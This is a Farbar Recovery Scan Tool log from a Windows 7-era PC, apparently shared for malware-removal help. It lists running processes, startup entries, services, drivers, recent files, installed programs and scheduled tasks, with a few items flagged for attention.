Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgcsrvx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgwdsvc.exe
(Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(Creative Technology Ltd) C:\Program Files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgui.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgnsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgemcx.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [292208 2010-06-04] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Dell Webcam Central] => C:\Program Files\Dell Webcam\Dell Webcam Central\WebcamDell2.exe [409744 2009-06-24] (Creative Technology Ltd)
HKLM\...\Run: [sunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\AVG2015\avgui.exe [3667472 2014-12-18] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [sDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\Run: [DellSystemDetect] => C:\Users\User\AppData\Local\Apps\2.0\NLO15GEQ.9JN\QY5WA4B1.38M\dell..tion_e30b47f5d4a30e9e_0005.000c_1df9a4898fae00de\DellSystemDetect.exe [264488 2014-11-03] (Dell)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\OemReset.lnk
ShortcutTarget: OemReset.lnk -> C:\Windows\options\OemReset.exe (SoftThinks SAS)
BootExecute: autocheck autochk * sdnclean.exe
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [s-1-5-21-3179565126-1180787063-359821708-1000] => http=127.0.0.1:49329;https=127.0.0.1:49329
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3179565126-1180787063-359821708-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.foxnews.com/
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3179565126-1180787063-359821708-1000: ubisoft.com/uplaypc -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\CrazyTalk4Native.dll (C3D)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctdomemhelper.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctframeplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\imagickrt.dll (BEXTech)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npRLCT4Player.dll ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\rlcontentclass.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLMusicPacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLMusicUnpacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLVoicePacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\RLVoiceUnpacker.dll ()

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVGIDSAgent; C:\Program Files\AVG\AVG2015\avgidsagent.exe [3432976 2014-12-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2015\avgwdsvc.exe [298080 2014-12-18] (AVG Technologies CZ, s.r.o.)
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [1678040 2013-10-02] (Broadcom Corporation.)
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-26] (Microsoft Corporation)
S3 CaCCProvSP; "C:\Program Files\Total Defense\Internet Security Suite\ccprovsp.exe" [X]
S2 ccSchedulerSVC; C:\Program Files\Total Defense\Internet Security Suite\ccschedulersvc.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 Acceler; C:\Windows\System32\DRIVERS\accelern.sys [44144 2011-10-03] (ST Microelectronics)
R1 Avgdiskx; C:\Windows\System32\DRIVERS\avgdiskx.sys [121624 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [208152 2014-12-08] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [154904 2014-11-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [192792 2014-08-28] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\Windows\System32\DRIVERS\avglogx.sys [230680 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [98584 2014-10-05] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [27416 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [200984 2014-10-10] (AVG Technologies CZ, s.r.o.)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [174936 2013-10-02] (Broadcom Corporation.)
S3 btwampfl; C:\Windows\System32\DRIVERS\btwampfl.sys [144600 2013-10-02] (Broadcom Corporation.)
R3 cvusbdrv; C:\Windows\System32\Drivers\cvusbdrv.sys [32808 2008-07-23] (Broadcom Corporation)
R3 NETwNs32; C:\Windows\System32\DRIVERS\Netwsn00.sys [10364416 2012-06-03] (Intel Corporation)
S2 risdpcie; C:\Windows\System32\DRIVERS\RISDPE64.SYS [79360 2009-10-28] (REDC) [File not signed]
R0 stdcfltn; C:\Windows\System32\DRIVERS\stdcfltn.sys [17904 2011-07-15] (ST Microelectronics)
S3 USB28xxBGA; C:\Windows\System32\DRIVERS\emBDAA.sys [660120 2012-05-04] (eMPIA Technology, Inc.)
S3 USB28xxOEM; C:\Windows\System32\DRIVERS\emOEMA.sys [1085592 2012-05-04] (eMPIA Technology, Inc.)
S3 catchme; \??\C:\Users\User\AppData\Local\Temp\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-24 23:45 - 2015-01-24 23:45 - 00049646 _____ () C:\ComboFix.txt
2015-01-24 23:28 - 2015-01-24 23:28 - 00000000 ____D () C:\Users\User\Documents\ProcAlyzer Dumps
2015-01-24 13:30 - 2011-06-26 00:45 - 00256000 _____ () C:\Windows\PEV.exe
2015-01-24 13:30 - 2010-11-07 11:20 - 00208896 _____ () C:\Windows\MBR.exe
2015-01-24 13:30 - 2009-04-19 22:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00098816 _____ () C:\Windows\sed.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00080412 _____ () C:\Windows\grep.exe
2015-01-24 13:30 - 2000-08-30 18:00 - 00068096 _____ () C:\Windows\zip.exe
2015-01-24 13:28 - 2015-01-24 23:45 - 00000000 ____D () C:\Qoobox
2015-01-24 13:23 - 2015-01-24 16:08 - 00000000 ____D () C:\Windows\erdnt
2015-01-14 22:04 - 2015-01-26 16:43 - 00000000 ____D () C:\Users\User\Desktop\Malware stuff
2015-01-14 21:04 - 2015-01-26 16:43 - 00000000 ____D () C:\FRST
2015-01-14 19:59 - 2015-01-24 13:35 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2015-01-13 22:17 - 2014-12-11 23:11 - 03971512 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-01-13 22:17 - 2014-12-11 23:11 - 03916728 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-01-13 21:13 - 2014-12-18 19:34 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-01-13 21:07 - 2014-12-18 20:43 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-01-13 21:07 - 2014-12-11 11:47 - 00056320 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-01-13 21:07 - 2014-12-05 21:50 - 00242688 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-01-12 09:58 - 2015-01-12 09:58 - 00000000 ____D () C:\Users\Default\AppData\Roaming\TuneUp Software
2015-01-12 09:58 - 2015-01-12 09:58 - 00000000 ____D () C:\Users\Default User\AppData\Roaming\TuneUp Software
2015-01-05 17:30 - 2015-01-07 17:21 - 00000000 ____D () C:\Users\User\Downloads\avast free
2015-01-02 13:33 - 2015-01-21 15:41 - 00034171 _____ () C:\Users\Public\Documents\Master Volunteer List thru Dec 2014.xlsx
2015-01-02 12:42 - 2015-01-02 12:42 - 00000165 ____H () C:\Users\Public\Documents\~$Master Volunteer List thru Nov 2014.xlsx

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-26 16:44 - 2014-11-23 10:27 - 00000000 ____D () C:\ProgramData\MFAData
2015-01-26 16:43 - 2013-10-02 18:48 - 01983669 _____ () C:\Windows\WindowsUpdate.log
2015-01-26 16:41 - 2013-02-11 12:09 - 00701616 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2015-01-26 16:41 - 2013-02-11 12:09 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2015-01-26 16:41 - 2013-02-11 12:09 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-01-25 11:48 - 2009-07-13 22:34 - 00024832 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-25 11:48 - 2009-07-13 22:34 - 00024832 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-25 11:41 - 2013-02-09 05:35 - 01162034 _____ () C:\Windows\PFRO.log
2015-01-25 11:41 - 2009-07-13 22:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-01-25 11:41 - 2009-07-13 22:39 - 00049616 _____ () C:\Windows\setupact.log
2015-01-24 23:43 - 2009-07-13 20:04 - 00000215 _____ () C:\Windows\system.ini
2015-01-24 23:31 - 2014-11-23 21:08 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2015-01-24 23:18 - 2014-11-03 21:32 - 00000000 ____D () C:\Users\User\AppData\Local\Apps\2.0
2015-01-24 17:28 - 2014-06-15 13:21 - 00000000 ____D () C:\Users\User\AppData\Roaming\Battle.net
2015-01-24 17:28 - 2014-06-15 13:21 - 00000000 ____D () C:\Users\User\AppData\Local\Battle.net
2015-01-24 17:28 - 2014-06-15 13:19 - 00000000 ____D () C:\ProgramData\Battle.net
2015-01-24 17:20 - 2013-10-16 13:14 - 00000000 ___HD () C:\Program Files\InstallShield Installation Information
2015-01-24 17:19 - 2014-01-29 03:10 - 00000000 ____D () C:\Users\User\AppData\Local\Cyberlink
2015-01-24 17:19 - 2013-10-16 13:12 - 00000000 ____D () C:\Program Files\CyberLink
2015-01-24 16:26 - 2014-08-13 20:31 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-01-24 16:11 - 2009-07-13 20:37 - 00000000 ___RD () C:\Users\Public
2015-01-14 21:01 - 2013-02-08 18:15 - 00781298 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-01-14 20:00 - 2014-11-10 08:03 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2015-01-13 23:28 - 2013-10-16 12:33 - 00000000 ____D () C:\Windows\system32\MRT
2015-01-13 23:24 - 2013-02-08 18:33 - 110348472 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-01-12 09:58 - 2014-11-23 11:33 - 00000935 _____ () C:\Users\Public\Desktop\AVG 2015.lnk
2015-01-12 09:58 - 2014-11-23 11:33 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2015-01-08 21:16 - 2014-05-14 17:47 - 00000000 ____D () C:\Users\Public\Documents\Kayla
2015-01-05 17:22 - 2014-08-13 20:31 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-01-05 17:22 - 2014-08-13 20:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-01-05 17:22 - 2014-08-13 20:31 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2015-01-02 13:30 - 2014-12-04 10:50 - 00032082 _____ () C:\Users\Public\Documents\Master Volunteer List thru Nov 2014.xlsx

==================== Files in the root of some directories =======

2014-11-04 21:33 - 2014-11-04 21:33 - 0000000 _____ () C:\Users\User\AppData\Roaming\qkmrs.dll
2013-12-25 09:47 - 2014-01-25 12:43 - 0005632 _____ () C:\Users\User\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-10-21 22:14 - 2013-10-21 22:14 - 0007602 _____ () C:\Users\User\AppData\Local\Resmon.ResmonCfg

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2015-01-14 17:23

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 24-01-2015 01
Ran by User at 2015-01-26 16:44:31
Running from C:\Users\User\Desktop\Malware stuff
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.296 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5645 - AVG Technologies)
AVG 2015 (Version: 15.0.4273 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5645 - AVG Technologies) Hidden
CorelVHS3X86 (HKLM\...\{CB91D8EE-AAC8-4921-AFCB-DB700EEF9D9B}) (Version: 1.05.0000 - Corel)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell System Detect (HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\73f463568823ebbe) (Version: 5.12.0.3 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1007.101.210 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM\...\Dell Webcam Central) (Version: 1.40.05 - Creative Technology Ltd)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 14.8 - Intel)
Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Live! Cam Avatar Creator (HKLM\...\{65D0C510-D7B6-4438-9FC8-E6B91115AB0D}) (Version: 4.6.3009.1 - Creative Technology Ltd)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-3179565126-1180787063-359821708-1000\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
OpenOffice 4.0.1 (HKLM\...\{47F460DA-D1BE-4D85-8DF2-AA1F31D3445F}) (Version: 4.01.9714 - Apache Software Foundation)
Revo Uninstaller 1.95 (HKLM\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}\InprocServer32 -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\localserver32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\localserver32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveShell.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3179565126-1180787063-359821708-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\User\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\FileSyncApi.dll (Microsoft Corporation)

==================== Restore Points  =========================

24-01-2015 13:30:52 ComboFix created restore point
24-01-2015 17:17:02 Configured PowerDVD
24-01-2015 17:21:57 Revo Uninstaller's restore point - Battle.net

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 20:04 - 2015-01-24 16:03 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {24101962-EFCD-48A3-9588-FE6571943DD3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {2E82AEF7-774A-4868-BDA0-4176292D000C} - System32\Tasks\{EBC0B43D-34B9-407B-966A-63943AD95EE7} => C:\Program Files\Freemake\Freemake Video Converter\FreemakeVideoConverter.exe
Task: {4480FA26-0DE2-4425-8D00-BFBA97D00B67} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: {534DD19A-C485-4F2C-8C31-A3D51C2B3CFD} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
Task: {5A6E07FB-BBC2-486C-8AF9-3ECD66601DA8} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
Task: {71519836-8433-4BC1-A669-7BFFA4D8575A} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-10] (PC-Doctor, Inc.)
